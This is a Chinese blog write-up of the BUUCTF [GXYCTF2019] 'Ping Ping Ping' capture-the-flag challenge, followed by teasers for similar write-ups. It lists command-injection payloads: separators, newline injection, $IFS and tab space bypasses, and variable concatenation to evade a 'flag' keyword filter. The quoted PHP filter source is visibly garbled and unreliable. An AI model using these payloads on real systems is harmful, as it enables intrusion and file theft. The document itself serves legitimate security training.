buuctf[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2025-10-30 11:19:21 发布
原创 最新推荐文章于 2025-10-30 11:19:21 发布 · 5.6k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

本文详细介绍了在buuctf[GXYCTF2019]Ping Ping Ping挑战中如何利用命令执行漏洞进行漏洞利用的过程,包括尝试的多种命令分隔符绕过方法和过滤字符的应对策略,最终成功获取flag。

buuctf[GXYCTF2019]Ping Ping Ping
在这里插入图片描述
这个题目的标题是pingping盲猜是关于命令执行的题目

打开环境后在这里插入图片描述

只有一个/ip=?
应该是提示用get的方式来传参一个地址执行ping的操作
直接ping127.0.0.1
在这里插入图片描述回显ping127.0.0.1的数据
说明是一道命令执行的题目
执行:?ip=127.0.0.1|ls
其中|的作用是命令分隔符
还有相关的符号
; --在 shell 中,是”连续指令”
& --不管第一条命令成功与否,都会执行第二条命令
&& --第一条命令成功,第二条才会执行
| --第一条命令的结果,作为第二条命令的输入
|| --第一条命令失败,第二条才会执行
这里采用|来执行
如果全部过滤
过滤了命令分割符,用%0a便可以分隔命令进行查看
127.0.0.1%0als

在这里插入图片描述
回显两个文件
直接访问flag.php
在这里插入图片描述回显有过滤空格

既然过滤空格就绕过空格
常见的绕过符号有:
$IFS9、9 、9IFS1、1、1{IFS} 、%09(php环境下)、 重定向符<>、<、
{cat,flag.php} //用逗号实现了空格功能

采用{cat,flag.php} //用逗号实现了空格功能
构造payload:?ip=127.0.0.1|cat,flag.php
在这里插入图片描述
回显过滤了flag这个字符串
尝试拼接绕过;
a=fl;b=ag;aaab
构造:cat,a=fl;b=ag;aaab
回显相同
说明这种绕过方式没有用
那就先看一下index.php
构造:/?ip=127.0.0.1|cat,index.php
回显:
在这里插入图片描述
应该是,不能代替空格绕过
换一个?ip=127.0.0.1|cat%09index.php
回显:
在这里插入图片描述再换
?ip=127.0.0.1|cat$IFS$2index.php
在这里插入图片描述
回显
/?ip=
|’|"|\|(|)|[|]|{|}/", ip,ip,ip,匹配)){
回preg_match("/&|/|?|*|<|[\x{00}-\x{20}]|>|’|"|\|(|)|[|]|{|}/", ip,ip,ip,匹配);
die(“fxck你的符号!”);
}else if(preg_match("//",ip))die("fxck你的空间!");elseif(pregmatch("/bash/",ip)){ die("fxck你的空间!"); }else if(preg_match("/bash/",ip))die("fxck");elseif(pregmatch("/bash/",ip)){
die(“fxck您的庆典!”);
}else if(preg_match("/.*f.*l.*a.g./", $ip)){
die(“fxck你的标志!”);
}
a=shellexec("ping−c4".a=shell_exec("ping-c4".a=shellexec("pingc4".ip);
echo"

";
print_r($a);
}

?>

发现过滤了很多包括空格、一些符号/.*f.*l.*a.g./、flag

构造拼接绕过?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php

在这里插入图片描述
在源代码中找到flag
在这里插入图片描述

BUUCTF系列 // [GXYCTF2019] Ping Ping Ping
qq_45805420的博客
10-01 555
前言 本题知识点:命令执行漏洞 WP 打开题目页面,提示很明显,那就先随便 ping 个 IP 地址看看效果 可以看到系统命令被正常执行了,有正确回显 接下来尝试一下是否存在命令执行漏洞,首先用 ls 试一试,看看有没有提示 flag 所在的位置 发现确实存在着命令执行,并且得到了新的线索 先试着直接用 cat 命令读取 flag.php 文件的内容 题目报了个错,(初看没太明白这个提示,后来结合其他的报错,意识到此处原因为空格被过滤了) 既然题目过滤了空格,那就用绕过试试呗 PS:命令执行漏洞,绕过
[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析(贪婪匹配,空格过滤)
2301_79326813的博客
01-31 1686
先看网页按照正常流程,先ip+ls,可以看到flag但是不能直接得flag,他应该是过滤掉了一点东西。这里考虑过滤掉了空格。
BUUCTF-[GXYCTF2019]Ping Ping Ping题解
2401_88570825的博客
07-23 709
BUUCTF-[GXYCTF2019]Ping Ping Ping题解
[GXYCTF2019]Ping Ping Ping1题解
最新发布
JOY_ZouQY的博客
10-30 590
发现有flag和index两个php文件,那flag多半就在这个flag.php文件里了,那我们直接试试连接这个flag.php呢,/?通过回显结果我们可以看出来,基本上所有符号都被过滤了,所以正常来说的绕过方法都行不通了(像单双引号,bash,字符拼接都不行)PING下面那四行就是返回的结果,有四行是因为一般默认就ping上传四个包,然后底下是丢包率,响应时间等。我们这里输入ls,让它把目录列出来,输入/?回显是正常的,那我们再在ip后面加上一条自己的命令,看能不能执行。
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 384
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
BUUCTF系列】[GXYCTF2019]Ping Ping Ping 1
2402_84408069的博客
08-01 1353
本文分析了某靶机存在的命令注入漏洞,通过逐步测试发现系统对ip参数存在黑名单过滤机制(检测空格、bash、flag等关键词)。研究提出利用$IFS$1绕过空格限制,通过变量拼接(如a=g;fla$a.php)规避flag关键词检测,最终构造出有效Payload/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php成功读取flag文件。文章强调该技术仅限授权测试使用,并详述了绕过黑名单过滤的完整思路与语法构造原理。
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 799
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1613
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1471
BUUctf [GXYCTF2019]Ping Ping Ping
BUUCTF-[GXYCTF2019]Ping Ping Ping
qq_62875941的博客
12-28 507
打开链接 /?ip=(GET传参方式) 这题跟[ACTF2020 新生赛]Exec1差不多 那我们先看看有啥文件 /?ip=;ls或者/?ip=127.0.0.1;ls (ip地址写啥都行,其中127.0.0.1ping的是本机的地址) 发现里面有flag.php文件 但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久 下面来总结一下常见的绕过方法 1.空格 (1)%20 (2)%09 (3)<> (4)$..
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 6984
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
[GXYCTF2019]Ping Ping Ping 1-BUUCTF
ZZHow Blog
07-30 1472
本文介绍了命令注入(Command Injection)的漏洞利用方法,以[GXYCTF2019]Ping Ping Ping题目为例。通过观察题目界面发现GET方法存在ip参数,尝试用分号连接命令实现注入。在成功执行ls命令发现flag.php后,尝试绕过空格检测(使用$IFS$9)和关键词过滤(使用环境变量拼接)。最终通过开发者工具查看页面源码找到被注释的flag。文章详细展示了命令注入的测试过程和绕过技巧。 写于2023/11/15
BUUCTF-Web渗透之GXYCTF2019 Ping Ping Ping
cai_huaer的博客
02-26 432
4.能命令执行后,尝试直接cat flag.php,即ip=127.0.0.1|cat flag.php,发现返回了/?”,即:ip=127.0.0.1|ls或者ip=127.0.0.1;,*等都是特殊字符不让输入,空格、bash也不让输入,如果有满足顺序为flag的字符,中间可以插入任意字符,也是不能输入的。cat$IFSindex.php,不显示其他内容,只显示ping的内容。结果不再报错,但是也没有其余多的显示,还是出现ping的结果。cat$IFSflag.php,结果返回。
BUUCTFping ping ping
m0_54993799的博客
12-19 1091
可以看到并没有绕过对flag关键字的过滤;换成index,没有对index.php进行过滤但也没有出现内容。直接查看flag.php,但不允许。$IFS$9可以绕过 ,但是又出现了新的问题,过滤了 flag。使用反引号``(优先级高的特性),查看 flag.php。用 ls 查看文件可执行,确定系统为Linux系统。同时,从返回结果看,我们要找的flag文件就在眼前。除了执行查询IP的结果,还有一些PHP代码。发现有flag的内容但不直接显示在页面上。开启靶机 =》 访问靶机链接。${IFS} 也被禁了。
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 8575
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
Buuctf-[GXYCTF2019]Ping Ping Ping
m0_63563528的博客
04-18 252
如上,flag 字符被过滤,并不能直接cat到flag了,怎么办?审阅此源代码,发现“flag”不能按照 “f” “l” “a” “g”的顺序出现,否则要被过滤,这个叫做贪婪匹配。space 空格,它过滤了空格;我为啥替换“g”呢?因为替换位置不同,结果也不同,多试错。题目:PingPingPing
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 803
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值